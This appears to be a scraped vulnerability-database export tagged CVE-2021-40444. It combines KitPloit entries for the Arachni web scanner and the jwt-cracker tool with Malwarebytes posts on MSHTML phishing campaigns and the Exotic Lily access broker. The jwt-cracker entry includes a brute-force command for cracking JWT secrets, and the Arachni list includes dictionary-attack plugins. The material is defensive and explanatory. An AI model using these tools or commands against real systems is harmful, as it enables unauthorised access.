\n * Proxy authentication. \n * Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others). \n * Automatic log-out detection and re-login during the scan (when the initial login was performed via the ` autologin ` , ` login_script ` or ` proxy ` plugins). \n * Custom 404 page detection. \n * UI abstraction: \n\n * [ Command-line Interface ](<https://github.com/Arachni/arachni/wiki/Executables>) . \n * [ Web User Interface ](<https://github.com/Arachni/arachni-ui-web>) . \n * Pause/resume functionality. \n * Hibernation support -- Suspend to and restore from disk. \n * High performance asynchronous HTTP requests. \n\n * With adjustable concurrency. \n * With the ability to auto-detect server health and adjust its concurrency automatically. \n * Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs. \n\n \n\n\n** Integrated browser environment **\n\nArachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc. \n\nIn addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni's browsers also hook into popular frameworks to make the logged data easier to digest: \n\n * [ JQuery ](<https://jquery.com/>)\n * [ AngularJS ](<https://angularjs.org/>)\n * More to come... \n\nIn essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time. \n\nRelevant information include: \n\n * Page DOM, as HTML code. \n\n * With a list of DOM transitions required to restore the state of the page to the one at the time it was logged. 
\n * Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code. \n\n * With a list of DOM transitions. \n * Data-flow sinks -- Each sink is a JS method which received a tainted argument. \n\n * Parent object of the method (ex.: ` DOMWindow ` ). \n * Method signature (ex.: ` decodeURIComponent() ` ). \n * Arguments list. \n\n * With the identified taint located recursively in the included objects. \n * Method source code. \n * JS stacktrace. \n * Execution flow sinks -- Each sink is a successfully executed JS payload, as injected by the security checks. \n\n * Includes a JS stacktrace. \n * JavaScript stack-traces include: \n\n * Method names. \n * Method locations. \n * Method source codes. \n * Argument lists. \n\nIn essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue. \n\n \n\n\n** Browser-cluster **\n\nThe browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion. \n\nConfiguration options include: \n\n * Adjustable pool-size, i.e. the amount of browser workers to utilize. \n * Timeout for each job. \n * Worker TTL counted in jobs -- Workers which exceed the TTL have their browser process respawned. \n * Ability to disable loading images. \n * Adjustable screen width and height. \n\n * Can be used to analyze responsive and mobile applications. \n * Ability to wait until certain elements appear in the page. \n * Configurable local storage data. \n\n \n\n\n** Coverage **\n\nThe system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would. 
\n\nIn addition to that, it also knows about which browser state changes the application has been programmed to handle and is able to trigger them programmatically in order to provide coverage for a full set of possible scenarios. \n\nBy inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs: \n\n * Forms \n\n * Along with ones that require interaction via a real browser due to DOM events. \n * User-interface Forms \n\n * Input and button groups which don't belong to an HTML ` <form> ` element but are instead associated via JS code. \n * User-interface Inputs \n\n * Orphan ` <input> ` elements with associated DOM events. \n * Links \n\n * Along with ones that have client-side parameters in their fragment, i.e.: ` http://example.com/#/?param=val&param2=val2 `\n * With support for rewrite rules. \n * LinkTemplates -- Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates -- useful when rewrite rules are not available. \n\n * Along with ones that have client-side parameters in their URL fragments, i.e.: ` http://example.com/#/param/val/param2/val2 `\n * Cookies \n * Headers \n * Generic client-side elements which have associated DOM events. \n * AJAX-request parameters. \n * JSON request data. \n * XML request data. \n\n \n\n\n** Open [ distributed architecture ](<https://github.com/Arachni/arachni/wiki/Distributed-components>) **\n\nArachni is designed to fit into your workflow and easily integrate with your existing infrastructure. \n\nDepending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol. \n\nBoth approaches allow you to: \n\n * Remotely monitor and manage scans. \n * Perform multiple scans at the same time -- Each scan is compartmentalized to its own OS process to take advantage of: \n\n * Multi-core/SMP architectures. 
\n * OS-level scheduling/restrictions. \n * Sandboxed failure propagation. \n * Communicate over a secure channel. \n\n \n\n\n** [ REST API ](<https://github.com/Arachni/arachni/wiki/REST-API>) **\n\n * Very simple and straightforward API. \n * Easy interoperability with non-Ruby systems. \n\n * Operates over HTTP. \n * Uses JSON to format messages. \n * Stateful scan monitoring. \n\n * Unique sessions automatically only receive updates when polling for progress, rather than full data. \n\n \n\n\n** [ RPC API ](<https://github.com/Arachni/arachni/wiki/RPC-API>) **\n\n * High-performance/low-bandwidth [ communication protocol ](<https://github.com/Arachni/arachni-rpc>) . \n\n * ` MessagePack ` serialization for performance, efficiency and ease of integration with 3rd party systems. \n * Grid: \n\n * Self-healing. \n * Scale up/down by hot-plugging/hot-unplugging nodes. \n\n * Can scale up infinitely by adding nodes to increase scan capacity. \n * _ (Always-on) _ Load-balancing -- All Instances are automatically provided by the least burdened Grid member. \n\n * With optional per-scan opt-out/override. \n * _ (Optional) _ High-Performance mode -- Combines the resources of multiple nodes to perform multi-Instance scans. \n\n * Enabled on a per-scan basis. \n\n \n\n\n** Scope configuration **\n\n * Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters. \n\n * Can optionally detect and ignore redundant pages automatically. \n * URL exclusion filters using regular expressions. \n * Page exclusion filters based on content, using regular expressions. \n * URL inclusion filters using regular expressions. \n * Can be forced to only follow HTTPS paths and not downgrade to HTTP. \n * Can optionally follow subdomains. \n * Adjustable page count limit. \n * Adjustable redirect limit. \n * Adjustable directory depth limit. \n * Adjustable DOM depth limit. \n * Adjustment using URL-rewrite rules. 
\n * Can read paths from multiple user supplied files (to both restrict and extend the scope). \n\n \n\n\n** Audit **\n\n * Can audit: \n\n * Forms \n\n * Can automatically refresh nonce tokens. \n * Can submit them via the integrated browser environment. \n * User-interface Forms \n\n * Input and button groups which don't belong to an HTML ` <form> ` element but are instead associated via JS code. \n * User-interface Inputs \n\n * Orphan ` <input> ` elements with associated DOM events. \n * Links \n\n * Can load them via the integrated browser environment. \n * LinkTemplates \n\n * Can load them via the integrated browser environment. \n * Cookies \n\n * Can load them via the integrated browser environment. \n * Headers \n * Generic client-side DOM elements. \n * JSON request data. \n * XML request data. \n * Can ignore binary/non-text pages. \n * Can audit elements using both ` GET ` and ` POST ` HTTP methods. \n * Can inject both raw and HTTP encoded payloads. \n * Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage. \n * Can exclude specific input vectors by name. \n * Can include specific input vectors by name. \n\n \n\n\n** Components **\n\nArachni is a highly modular system, employing several components of distinct types to perform its duties. \n\nIn addition to enabling or disabling the bundled components so as to adjust the system's behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need. \n\n \n\n\n** Platform fingerprinters **\n\nIn order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads. 
\n\nCurrently, the following platforms can be identified: \n\n * Operating systems \n\n * BSD \n * Linux \n * Unix \n * Windows \n * Solaris \n * Web servers \n\n * Apache \n * IIS \n * Nginx \n * Tomcat \n * Jetty \n * Gunicorn \n * Programming languages \n\n * PHP \n * ASP \n * ASPX \n * Java \n * Python \n * Ruby \n * Frameworks \n\n * Rack \n * CakePHP \n * Rails \n * Django \n * ASP.NET MVC \n * JSF \n * CherryPy \n * Nette \n * Symfony \n\nThe user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether. \n\nFinally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms. \n\n \n\n\n** Checks **\n\n_ Checks _ are system components which perform security checks and log issues. \n\n \n\n\n** Active **\n\nActive checks engage the web application via its inputs. \n\n * SQL injection ( ` sql_injection ` ) -- Error based detection. \n\n * Oracle \n * InterBase \n * PostgreSQL \n * MySQL \n * MSSQL \n * EMC \n * SQLite \n * DB2 \n * Informix \n * Firebird \n * SaP Max DB \n * Sybase \n * Frontbase \n * Ingres \n * HSQLDB \n * MS Access \n * Blind SQL injection using differential analysis ( ` sql_injection_differential ` ). \n * Blind SQL injection using timing attacks ( ` sql_injection_timing ` ). \n\n * MySQL \n * PostgreSQL \n * MSSQL \n * NoSQL injection ( ` no_sql_injection ` ) -- Error based vulnerability detection. \n\n * MongoDB \n * Blind NoSQL injection using differential analysis ( ` no_sql_injection_differential ` ). \n * CSRF detection ( ` csrf ` ). \n * Code injection ( ` code_injection ` ). \n\n * PHP \n * Ruby \n * Python \n * Java \n * ASP \n * Blind code injection using timing attacks ( ` code_injection_timing ` ). \n\n * PHP \n * Ruby \n * Python \n * Java \n * ASP \n * LDAP injection ( ` ldap_injection ` ). \n * Path traversal ( ` path_traversal ` ). 
\n\n * *nix \n * Windows \n * Java \n * File inclusion ( ` file_inclusion ` ). \n\n * *nix \n * Windows \n * Java \n * PHP \n * Perl \n * Response splitting ( ` response_splitting ` ). \n * OS command injection ( ` os_cmd_injection ` ). \n\n * *nix \n * *BSD \n * IBM AIX \n * Windows \n * Blind OS command injection using timing attacks ( ` os_cmd_injection_timing ` ). \n\n * Linux \n * *BSD \n * Solaris \n * Windows \n * Remote file inclusion ( ` rfi ` ). \n * Unvalidated redirects ( ` unvalidated_redirect ` ). \n * Unvalidated DOM redirects ( ` unvalidated_redirect_dom ` ). \n * XPath injection ( ` xpath_injection ` ). \n\n * Generic \n * PHP \n * Java \n * dotNET \n * libXML2 \n * XSS ( ` xss ` ). \n * Path XSS ( ` xss_path ` ). \n * XSS in event attributes of HTML elements ( ` xss_event ` ). \n * XSS in HTML tags ( ` xss_tag ` ). \n * XSS in script context ( ` xss_script_context ` ). \n * DOM XSS ( ` xss_dom ` ). \n * DOM XSS script context ( ` xss_dom_script_context ` ). \n * Source code disclosure ( ` source_code_disclosure ` ) \n * XML External Entity ( ` xxe ` ). \n\n * Linux \n * *BSD \n * Solaris \n * Windows \n\n \n\n\n** Passive **\n\nPassive checks look for the existence of files, folders and signatures. \n\n * Allowed HTTP methods ( ` allowed_methods ` ). \n * Back-up files ( ` backup_files ` ). \n * Backup directories ( ` backup_directories ` ) \n * Common administration interfaces ( ` common_admin_interfaces ` ). \n * Common directories ( ` common_directories ` ). \n * Common files ( ` common_files ` ). \n * HTTP PUT ( ` http_put ` ). \n * Insufficient Transport Layer Protection for password forms ( ` unencrypted_password_form ` ). \n * WebDAV detection ( ` webdav ` ). \n * HTTP TRACE detection ( ` xst ` ). \n * Credit Card number disclosure ( ` credit_card ` ). \n * CVS/SVN user disclosure ( ` cvs_svn_users ` ). \n * Private IP address disclosure ( ` private_ip ` ). \n * Common backdoors ( ` backdoors ` ). 
\n * .htaccess LIMIT misconfiguration ( ` htaccess_limit ` ). \n * Interesting responses ( ` interesting_responses ` ). \n * HTML object grepper ( ` html_objects ` ). \n * E-mail address disclosure ( ` emails ` ). \n * US Social Security Number disclosure ( ` ssn ` ). \n * Forceful directory listing ( ` directory_listing ` ). \n * Mixed Resource/Scripting ( ` mixed_resource ` ). \n * Insecure cookies ( ` insecure_cookies ` ). \n * HttpOnly cookies ( ` http_only_cookies ` ). \n * Auto-complete for password form fields ( ` password_autocomplete ` ). \n * Origin Spoof Access Restriction Bypass ( ` origin_spoof_access_restriction_bypass ` ) \n * Form-based upload ( ` form_upload ` ) \n * localstart.asp ( ` localstart_asp ` ) \n * Cookie set for parent domain ( ` cookie_set_for_parent_domain ` ) \n * Missing ` Strict-Transport-Security ` headers for HTTPS sites ( ` hsts ` ). \n * Missing ` X-Frame-Options ` headers ( ` x_frame_options ` ). \n * Insecure CORS policy ( ` insecure_cors_policy ` ). \n * Insecure cross-domain policy (allow-access-from) ( ` insecure_cross_domain_policy_access ` ) \n * Insecure cross-domain policy (allow-http-request-headers-from) ( ` insecure_cross_domain_policy_headers ` ) \n * Insecure client-access policy ( ` insecure_client_access_policy ` ) \n\n \n\n\n** Reporters **\n\n * Standard output \n * [ HTML ](<http://www.arachni-scanner.com/reports/report.html/>) ( [ zip ](<http://www.arachni-scanner.com/reports/report.html.zip>) ) ( ` html ` ). \n * [ XML ](<http://www.arachni-scanner.com/reports/report.xml>) ( ` xml ` ). \n * [ Text ](<http://www.arachni-scanner.com/reports/report.txt>) ( ` text ` ). 
\n * [ JSON ](<http://www.arachni-scanner.com/reports/report.json>) ( ` json ` ) \n * [ Marshal ](<http://www.arachni-scanner.com/reports/report.marshal>) ( ` marshal ` ) \n * [ YAML ](<http://www.arachni-scanner.com/reports/report.yml>) ( ` yaml ` ) \n * [ AFR ](<http://www.arachni-scanner.com/reports/report.afr>) ( ` afr ` ) \n\n * The default Arachni Framework Report format. \n\n \n\n\n** Plugins **\n\nPlugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality. \n\n * Passive Proxy ( ` proxy ` ) -- Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit. \n * Form based login ( ` autologin ` ). \n * Script based login ( ` login_script ` ). \n * Dictionary attacker for HTTP Auth ( ` http_dicattack ` ). \n * Dictionary attacker for form based authentication ( ` form_dicattack ` ). \n * Cookie collector ( ` cookie_collector ` ) -- Keeps track of cookies while establishing a timeline of changes. \n * WAF (Web Application Firewall) Detector ( ` waf_detector ` ) -- Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes. \n * BeepNotify ( ` beep_notify ` ) -- Beeps when the scan finishes. \n * EmailNotify ( ` email_notify ` ) -- Sends a notification (and optionally a report) over SMTP at the end of the scan. \n * VectorFeed ( ` vector_feed ` ) -- Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things. \n * Script ( ` script ` ) -- Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery. \n * Uncommon headers ( ` uncommon_headers ` ) -- Logs uncommon headers. 
\n * Content-types ( ` content_types ` ) -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files. \n * Vector collector ( ` vector_collector ` ) -- Collects information about all seen input vectors which are within the scan scope. \n * Headers collector ( ` headers_collector ` ) -- Collects response headers based on specified criteria. \n * Exec ( ` exec ` ) -- Calls external executables at different scan stages. \n * Metrics ( ` metrics ` ) -- Captures metrics about multiple aspects of the scan and the web application. \n * Restrict to DOM state ( ` restrict_to_dom_state ` ) -- Restricts the audit to a single page's DOM state, based on a URL fragment. \n * Webhook notify ( ` webhook_notify ` ) -- Sends a webhook payload over HTTP at the end of the scan. \n * Rate limiter ( ` rate_limiter ` ) -- Rate limits HTTP requests. \n * Page dump ( ` page_dump ` ) -- Dumps page data to disk as YAML. \n\n \n\n\n** Defaults **\n\nDefault plugins will run for every scan and are placed under ` /plugins/defaults/ ` . \n\n * AutoThrottle ( ` autothrottle ` ) -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization. \n * Healthmap ( ` healthmap ` ) -- Generates sitemap showing the health of each crawled/audited URL \n\n \n\n\n** Meta **\n\nPlugins under ` /plugins/defaults/meta/ ` perform analysis on the scan results to determine trustworthiness or just add context information or general insights. \n\n * TimingAttacks ( ` timing_attacks ` ) -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing. \n * Discovery ( ` discovery ` ) -- Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable. 
\n * Uniformity ( ` uniformity ` ) -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization. \n\n \n\n\n** Trainer subsystem **\n\nThe Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit. \n\nChecks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce. \n\nHowever, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly. \n\nStill, this can be an invaluable asset to Fuzzer checks. \n\n \n** [ Installation ](<https://github.com/Arachni/arachni/wiki/Installation>) ** \n \n** [ Usage ](<https://github.com/Arachni/arachni/wiki/User-guide>) ** \n \n** Running the specs ** \nYou can run ` rake spec ` to run ** all ** specs or you can run them selectively using the following: \n\n \n \n rake spec:core # for the core libraries\n rake spec:checks # for the checks\n rake spec:plugins # for the plugins\n rake spec:reports # for the reports\n rake spec:path_extractors # for the path extractors\n\n** Please be warned ** , the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system. \n** Note ** : _ The check specs will take many hours to complete due to the timing-attack tests. 
_ \n \n \n\n\n** [ Download Arachni ](<https://github.com/Arachni/arachni>) **\n", "cvss3": {}, "published": "2017-08-01T14:32:01", "type": "kitploit", "title": "Arachni v1.5.1 - Web Application Security Scanner Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-01T14:32:01", "id": "KITPLOIT:5230148353750207837", "href": "http://www.kitploit.com/2017/08/arachni-v151-web-application-security.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-23T20:37:55", "description": "[  ](<https://3.bp.blogspot.com/-9hFQ5Yv3Gu8/WYc-1er2-hI/AAAAAAAAIc8/6cU2xfWuZF01B_fRxg8LfwmDlv7ONo24gCLcBGAs/s1600/jwt-cracker.png>)\n\n \nSimple HS256 JWT token brute force cracker. \nEffective only to crack JWT tokens with weak secrets. \n** Recommendation ** : Use strong long secrets or RS256 tokens. \n \n** Install ** \nWith npm: \n\n \n \n npm install --global jwt-cracker\n\n \n** Usage ** \nFrom command line: \n\n \n \n jwt-cracker <token> [<alphabet>] [<maxLength>]\n\nWhere: \n\n\n * ** token ** : the full HS256 JWT token string to crack \n * ** alphabet ** : the alphabet to use for the brute force (default: \"abcdefghijklmnopqrstuwxyzABCDEFGHIJKLMNOPQRSTUWXYZ0123456789\") \n * ** maxLength ** : the max length of the string generated during the brute force (default: 12) \n \n** Requirements ** \nThis script requires Node.js version 6.0.0 or higher \n \n** Example ** \nCracking the default [ jwt.io example ](<https://jwt.io/>) : \n\n \n \n jwt-cracker \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ\" \"abcdefghijklmnopqrstuwxyz\" 6\n\nIt takes about 2 hours in a Macbook Pro (2.5GHz quad-core Intel Core i7). 
\n \n \n\n\n** [ Download jwt-cracker ](<https://github.com/lmammino/jwt-cracker>) **\n", "cvss3": {}, "published": "2017-08-06T16:08:58", "type": "kitploit", "title": "jwt-cracker - Simple HS256 JWT Token Brute Force Cracker", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-06T16:08:58", "id": "KITPLOIT:4074521293617632933", "href": "http://www.kitploit.com/2017/08/jwt-cracker-simple-hs256-jwt-token.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. 
And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. 
Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\nStay safe, everyone!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-18T23:27:45", "description": "The Google Threat Analysis Group (TAG) has shared their observations about a group of cybercriminals called Exotic Lily. This group has specialized as an initial access broker, which means they find a vulnerability in an organization's defenses, exploit that vulnerability, and sell the access to the victim's network to an interested party, several times over with different victims.\n\nAmong these interested parties TAG found the [Conti](<https://blog.malwarebytes.com/threat-spotlight/2021/05/threat-spotlight-conti-the-ransomware-used-in-the-hse-healthcare-attack/>) and Diavol ransomware groups. 
Because Exotic Lily's methods involved a lot of detail, they are believed to require a level of human interaction that is rather unusual for cybercrime groups focused on large scale operations.\n\n## Initial access broker\n\nLike in any maturing industry, you can expect to see specialization and diversification. Initial access brokers are an example of specialized cybercriminals. They will use a vulnerability to gain initial access, and, probably based on the nature of the target, sell this access to other cybercriminals that can use this access to deploy their specific malware.\n\nThese initial access brokers are different from the usual ransomware affiliates that will deploy the ransomware they are affiliated with themselves and use the infrastructure provided by the ransomware as a service (RaaS) group to get a chunk of the ransom if the victim decides to pay. The RaaS will provide the encryption software, the contact and leak sites, and negotiate the ransom with the victim. An initial access broker will inform another cybercriminal by letting them know they have found a way in at company xyz, and inquire how much they are willing to pay for that access.\n\n## Exotic Lily\n\nFrom the [TAG blog](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) we can learn that Exotic Lily was very much specialized. Their initial attack vector was email. Initially, they were targeting specific industries such as IT, cybersecurity, and healthcare, but that focus has become less stringent.\n\nTheir email campaigns gained credibility by spoofing companies and employees. Their email campaigns were targeted to a degree that they are believed to be sent by real human operators using little to no automation. 
To evade detection mechanisms they used common services like WeTransfer, TransferNow, and OneDrive to deliver the payload.\n\nLast year, researchers found that Exotic Lily used the vulnerability listed as [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>), a Microsoft MSHTML Remote Code Execution (RCE) vulnerability. Microsoft also posted a [blog](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) about attacks that exploited this vulnerability. Later, the group shifted to using customized versions of [BazarLoader](<https://blog.malwarebytes.com/detections/trojan-bazar/>) delivered inside ISO files.\n\nBased on the fact that Exotic Lily\u2019s operations require a lot of human interaction, the researchers did an analysis of the \u201cworking hours\u201d and came to the conclusion that it looks like a regular 9 to 5 operation located in a Central or Eastern Europe time zone.\n\n## Social engineering\n\nAs with most email campaigns, the amount of social engineering largely defines how successful such a campaign can be. Between the millions of emails sent in a "spray-and-pray" attack and the thousands that Exotic Lily sends out per day, there is a huge difference in success rate.\n\nExotic Lily used identity [spoofing](<https://blog.malwarebytes.com/cybercrime/2016/06/email-spoofing/>) where they replaced the TLD of a legitimate domain with \u201c.us\u201d, \u201c.co\u201d or \u201c.biz\u201d. At first, the group would create entirely fake personas posing as employees of a real company. These personas would come complete with social media profiles, personal websites, and AI-generated profile pictures. 
That must have been a lot of work, so at some point the group started to impersonate real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\nUsing such spoofed accounts, the attackers would send [spear phishing](<https://blog.malwarebytes.com/social-engineering/2020/01/spear-phishing-101-what-you-need-to-know/>) emails with a business proposal and even engage in further communication with the target by attempting to schedule a meeting to discuss the project's design or requirements.\n\n## IOC\u2019s\n\nSHA-256 hashes of the **BazarLoader** ISO samples:\n\nSHA-256 hashes of the **BUMBLEBEE** ISO samples:\n\n**IP** address of the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>):\n\n * 23.81.246.187\n\nStay safe, everyone!\n\nThe post [Meet Exotic Lily, access broker for ransomware and other malware peddlers](<https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T22:58:48", "type": "malwarebytes", "title": "Meet Exotic Lily, access broker for ransomware and other malware peddlers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-03-18T22:58:48", "id": "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "href": "https://blog.malwarebytes.com/threat-spotlight/2022/03/meet-exotic-lily-access-broker-for-ransomware-and-other-malware-peddlers/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. 
Although it's most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft's mitigations and workarounds to address CVE-2021-40444.\n\n### ActiveX\n\nBecause MSHTML is the beating heart of Internet Explorer, the vulnerability also exists in that browser. Although given its limited use, there is little risk of infection by that vector. Microsoft Office applications however, use the MSHTML component to display web content in Office documents.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nSo, the attacker will have to trick the user into opening a malicious document. But we all know how good some attackers are at this.\n\n### Mitigation\n\nAt the moment all supported Windows versions are vulnerable. 
